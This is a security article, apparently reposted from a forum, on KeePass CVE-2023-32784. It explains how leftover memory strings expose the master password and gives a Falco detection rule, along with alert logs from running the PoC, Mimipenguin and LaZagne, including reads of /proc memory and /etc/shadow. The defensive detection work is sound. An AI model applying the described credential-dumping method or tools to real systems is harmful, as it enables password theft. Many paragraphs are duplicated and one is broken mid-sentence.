KeePass CVE-2023-32784: What Is It ?
In May, a new security vulnerability affecting KeePass, CVE-2023-32784, was discovered. KeePass is a popular open-source password manager that can run on Windows, Mac, or Linux. This security vulnerability allows an attacker to extract the key in plaintext from the process's memory, granting them access to all stored credentials.
We strongly recommend updating to KeePass 2.54 to address this security vulnerability.
In this article, we explain the new security vulnerability CVE-2023-32784, how it works, and how to detect such an attack when an attacker gains full access to your system and employs advanced techniques to steal your credentials.
Credentials in Linux Memory
When we talk about credentials in Linux, we often think of the /etc/shadow file, but it's not the only place where passwords can be stored. Many processes also store credentials in memory, which malicious tools attempt to extract. For example, the proc directory described below is a popular vector for such attacks.
From the Linux Kernel Documentation:
"The /proc directory (among other things) contains one entry for each process running on the system, identified by a process identifier (PID)."
MITRE has defined the capability of adversaries collecting credentials through the proc filesystem as OS Credential Dumping: Proc Filesystem (T1003.007).
What Is KeePass CVE-2023-32784?
CVE-2023-32784 allows for the retrieval of a plaintext key from a memory dump. This memory dump can be from a KeePass process dump, a swap file (pagefile.sys), a hibernation file (hiberfil.sys), or a full system memory dump.
KeePass 2.X uses a custom text box called SecureTextBoxEx for password entry. The exploited flaw in this CVE is the creation of a leftover string in memory each time a character is typed. Due to the way .NET operates, once it's created, getting rid of it is nearly impossible. For example, when typing "Password," the following leftover strings are generated: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. The first character cannot be recovered.
CVE-2023-32784 allows for the retrieval of a plaintext key from a memory dump. This memory dump can be from a KeePass process dump, a swap file (pagefile.sys), a hibernation file (hiberfil.sys), or a full system memory dump.
KeePass 2.X uses a custom text box called SecureTextBoxEx for password entry. The exploited flaw in this CVE is the creation of a leftover string in memory each time a character is typed. Due to the way .NET operates, once it's created, getting rid of it is nearly impossible. For example, when typing "Password," the following leftover strings are generated: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. The first character cannot be recovered.
NOTE: We are using the 18.04.1-Ubuntu operating system to reproduce the scenario and KeePass version 2.38 for Linux. The Proof of Concept (PoC) we
use is also based on these GitHub repositories, which are part of the original PoC.
The Proof of Concept (PoC) we use follows these steps to extract the KeePass master key:
First, it scans all /proc/<pid>/cmdline files and saves the PIDs of those containing the keyword "KeePass."
Then, it retrieves the addresses of memory maps that are not directly associated with a library in /proc/<pid>/maps.
Finally, it stores the memory of all these maps into a buffer using /proc/<pid>/mem. It analyzes the memory to find the remaining strings as the user enters their master password; these strings appear as •a, ••s, •••s, and so on.
use is also based on these GitHub repositories, which are part of the original PoC.
The Proof of Concept (PoC) we use follows these steps to extract the KeePass master key:
First, it scans all /proc/<pid>/cmdline files and saves the PIDs of those containing the keyword "KeePass."
Then, it retrieves the addresses of memory maps that are not directly associated with a library in /proc/<pid>/maps.
Finally, it stores the memory of all these maps into a buffer using /proc/<pid>/mem. It analyzes the memory to find the remaining strings as the user enters their master password; these strings appear as •a, ••s, •••s, and so on.
As seen in the image above, the key has been exposed without the first character.
How Do We Detect KeePass CVE-2023-32784?
To detect such an attack, there should be access by an unknown process to the /proc folder. This will trigger an alert, and further investigation can be conducted.
If we attempt to detect this situation with Falco, an open-source project under the CNCF, which provides real-time detection of unusual activities in cloud-based environments, we need to set up the rule 'Read environmental variable from /proc files' or create a new rule.
To trigger this rule correctly, we need to modify the condition to capture reading of the /proc/<pid>/cmdline, /proc/<pid>/maps, or /proc/<pid>/mem files because these files are used in the PoC to obtain the KeePass master password.
How Do We Detect KeePass CVE-2023-32784?
To detect such an attack, there should be access by an unknown process to the /proc folder. This will trigger an alert, and further investigation can be conducted.
If we attempt to detect this situation with Falco, an open-source project under the CNCF, which provides real-time detection of unusual activities in cloud-based environments, we need to set up the rule 'Read environmental variable from /proc files' or create a new rule.
To trigger this rule correctly, we need to modify the condition to capture reading of the /proc/<pid>/cmdline, /proc/<pid>/maps, or /proc/<pid>/mem files because these files are used in the PoC to obtain the KeePass master password.
Kod:
- rule: Dump memory detection
desc: An attempt to read process environment variables from /proc files
condition: >
open_read and container and (fd.name glob "/proc/*/mem" or fd.name glob "/proc/*/maps")
output: >
Detected process memory dump to search for credentials (proc.name=%proc.name proc.pname=%proc.pname fd.name=%fd.name container=%container.info evt.type=%evt.type evt.arg.request=%evt.arg.request proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.cmdline=%proc.cmdline proc.pcmdline=%proc.pcmdline)With this new rule, we can detect the exploitation of CVE-2023-32784.
The alert contains all the information needed to further investigate the threat.
Kod:
10:47:47.232147057: Warning Detected process memory dump to search for credentials (proc.name=dump proc.pname=sudo fd.name=/proc/2859/mem container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=2916 proc.cwd=/home/kpdemo/CVE-2023-32784-keepass-linux/ proc.ppid=2915 proc.cmdline=dump proc.pcmdline=sudo ./dump gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/home/kpdemo/CVE-2023-32784-keepass-linux/dump user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)As mentioned in the exploitation, if the attacker has sufficient permissions and capabilities on your machine, they can carry out any malicious actions. However, this rule can help us determine whether our credentials have been compromised and act accordingly.
More Tools for Memory Dump
If we delve a bit deeper into this technique, we'll find other tools that perform a similar process. Let's take a look at a few examples and how we can detect them in the same way.
Mimipenguin
Mimipenguin 2.0 is a tool used to dump the login password of the current Linux desktop user. It's adapted based on the idea of the popular Windows credential theft tool, Mimikatz.
This tool attempts to do something similar to the KeePass Proof of Concept but in this case, it cannot find the key (because CVE has not been applied). However, it can obtain system credentials. In the image above, we can see both alerts; the first one is where it detected access to the /proc/<pid>/mem file.
More Tools for Memory Dump
If we delve a bit deeper into this technique, we'll find other tools that perform a similar process. Let's take a look at a few examples and how we can detect them in the same way.
Mimipenguin
Mimipenguin 2.0 is a tool used to dump the login password of the current Linux desktop user. It's adapted based on the idea of the popular Windows credential theft tool, Mimikatz.
This tool attempts to do something similar to the KeePass Proof of Concept but in this case, it cannot find the key (because CVE has not been applied). However, it can obtain system credentials. In the image above, we can see both alerts; the first one is where it detected access to the /proc/<pid>/mem file.
Kod:
10:56:59.508184318: Warning Detected process memory dump to search for credentials (proc.name=python proc.pname=sudo fd.name=/proc/1114/mem container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=7194 proc.cwd=/home/kpdemo/mimipenguin/ proc.ppid=7193 proc.cmdline=python mimipenguin.py proc.pcmdline=sudo python mimipenguin.py gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/usr/bin/python user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)The second one is where it gained access to the /etc/shadow file, from which it extracted the user's password.
Kod:
10:57:52.447428441: Warning Sensitive file opened for reading by non-trusted program (user=root user_loginuid=1000 program=python command=python mimipenguin.py pid=7194 file=/etc/shadow parent=sudo gparent=bash ggparent=gnome-terminal- gggparent=systemd container_id=host image=<NA>)LaZagne
The LaZagne project is an open-source application used to retrieve many passwords stored on a local computer. In this case, it not only focuses on memory but also searches for credentials using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
In this example, we see the alert again, which detected access, and the information showing that the tool found the user's password and the KeePass database we saved.
The LaZagne project is an open-source application used to retrieve many passwords stored on a local computer. In this case, it not only focuses on memory but also searches for credentials using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
In this example, we see the alert again, which detected access, and the information showing that the tool found the user's password and the KeePass database we saved.
Kod:
11:14:02.074516511: Warning Detected process memory dump to search for credentials (proc.name=python proc.pname=sudo fd.name=/proc/1114/maps container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=7253 proc.cwd=/home/kpdemo/LaZagne/Linux/ proc.ppid=7252 proc.cmdline=python laZagne.py all proc.pcmdline=sudo python laZagne.py all gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/usr/bin/python user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)Lesson Learned
Collecting credentials is a very common technique used by attackers. It's essential to have all the necessary tools to detect such actions and prevent them from moving laterally or affecting other services.
Falco provides a final layer of security that allows us to monitor access and detect any malicious behavior.
Finally, we strongly recommend updating to the latest version, KeePass 2.54.
Source : https://www.turkhackteam.org/konular/keepass-cve-2023-32784-nedir.2047567/
Collecting credentials is a very common technique used by attackers. It's essential to have all the necessary tools to detect such actions and prevent them from moving laterally or affecting other services.
Falco provides a final layer of security that allows us to monitor access and detect any malicious behavior.
Finally, we strongly recommend updating to the latest version, KeePass 2.54.
Source : https://www.turkhackteam.org/konular/keepass-cve-2023-32784-nedir.2047567/
